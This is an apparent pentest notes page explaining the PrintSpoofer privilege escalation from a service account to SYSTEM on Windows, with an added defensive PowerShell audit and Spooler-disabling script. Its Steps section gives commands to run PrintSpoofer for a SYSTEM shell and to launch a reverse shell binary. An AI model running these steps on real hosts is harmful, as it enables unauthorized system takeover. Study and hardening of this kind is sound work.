# Sweet Potato / PrintSpoofer

### Overview

**PrintSpoofer** is a **Windows local privilege escalation technique** that abuses the **Print Spooler service** to escalate from a **low-privileged service account** to **NT AUTHORITY\SYSTEM**.

It leverages:

* **SeImpersonatePrivilege**
* **Named pipe impersonation**
* **NTLM authentication over RPC**

This attack is known to work on `Windows Server 2012 / 2016` and may also work on `Windows Server 2019` / `Windows 10`.

### Why PrintSpoofer Works

The **Print Spooler service** runs as **SYSTEM** and exposes **named pipe interfaces** that allow clients to authenticate.

PrintSpoofer:

1. Creates a **malicious named pipe**
2. Forces the **Print Spooler** to authenticate to it
3. Captures the authentication token
4. **Impersonates the SYSTEM token**
5. Executes attacker-controlled code as SYSTEM

Windows allows this because:

* The calling process has **SeImpersonatePrivilege**
* The Spooler trusts the authentication channel

### Prerequisites

1. Local Code Execution
2. Token Privileges (must have `SeImpersonatePrivilege`)
3. Print Spooler Service Running
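The following PowerShell script is an added host-side audit, not part of the original checklist or the PrintSpoofer project. It checks the two conditions the technique depends on (a running Print Spooler and a token holding `SeImpersonatePrivilege`) and, when the `-Remediate` switch is given, applies the usual mitigation of stopping and disabling the Spooler on machines that do not print. The `-Remediate` switch name is this script's own choice; it assumes it is run in an elevated PowerShell on the host being audited.

```powershell
# Added audit script (not from the original page or the PrintSpoofer project).
# Reports whether the PrintSpoofer prerequisites exist on this host and, with
# -Remediate, disables the Print Spooler so there is no SYSTEM service to coerce.
# Assumptions: elevated PowerShell on the audited host; -Remediate is a name
# chosen for this script.
param(
    [switch]$Remediate
)

# 1. Print Spooler state: the SYSTEM service the technique forces to authenticate.
$spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
if ($null -eq $spooler) {
    Write-Output "Spooler service not installed: PrintSpoofer prerequisite absent."
} else {
    $startMode = (Get-CimInstance -ClassName Win32_Service -Filter "Name='Spooler'").StartMode
    Write-Output ("Spooler status: {0}, start mode: {1}" -f $spooler.Status, $startMode)
}

# 2. SeImpersonatePrivilege on the current token. 'whoami /priv' lists every
#    privilege the token holds with its state; a row marked 'Disabled' still
#    counts, because a process can enable a privilege its token already holds.
$privLine = whoami /priv | Select-String -Pattern 'SeImpersonatePrivilege'
if ($privLine) {
    Write-Output ("Current token holds SeImpersonatePrivilege: " + $privLine.Line.Trim())
} else {
    Write-Output "Current token does not hold SeImpersonatePrivilege."
}

# 3. Mitigation: on servers that never print (domain controllers, most
#    application servers) stop and disable the Spooler. Only done on request.
if ($Remediate -and $spooler -and $spooler.Status -eq 'Running') {
    Stop-Service -Name Spooler -Force
    Set-Service -Name Spooler -StartupType Disabled
    Write-Output "Spooler stopped and set to Disabled."
}
```

Run it without `-Remediate` first to see the state, then with `-Remediate` on hosts where printing is not required. Disabling the Spooler removes the service the technique coerces; it does not remove `SeImpersonatePrivilege` from service accounts, which is a separate hardening decision (the privilege is granted by default to IIS application pool and SQL Server service identities, so review which accounts actually need it).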

### Steps

1. Upload PrintSpoofer and verify privileges:

   ```batch
   copy PrintSpoofer.exe C:\Temp\
   ```
2. Check Print Spooler Status:

   ```batch
   sc query spooler
   ```
3. Execute PrintSpoofer:

   ```batch
   REM Execute a command and interact with the new process in the current command prompt
   PrintSpoofer.exe -i -c cmd

   REM Run a reverse shell and catch it
   PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i
   ```

### References

1. <https://github.com/itm4n/PrintSpoofer>

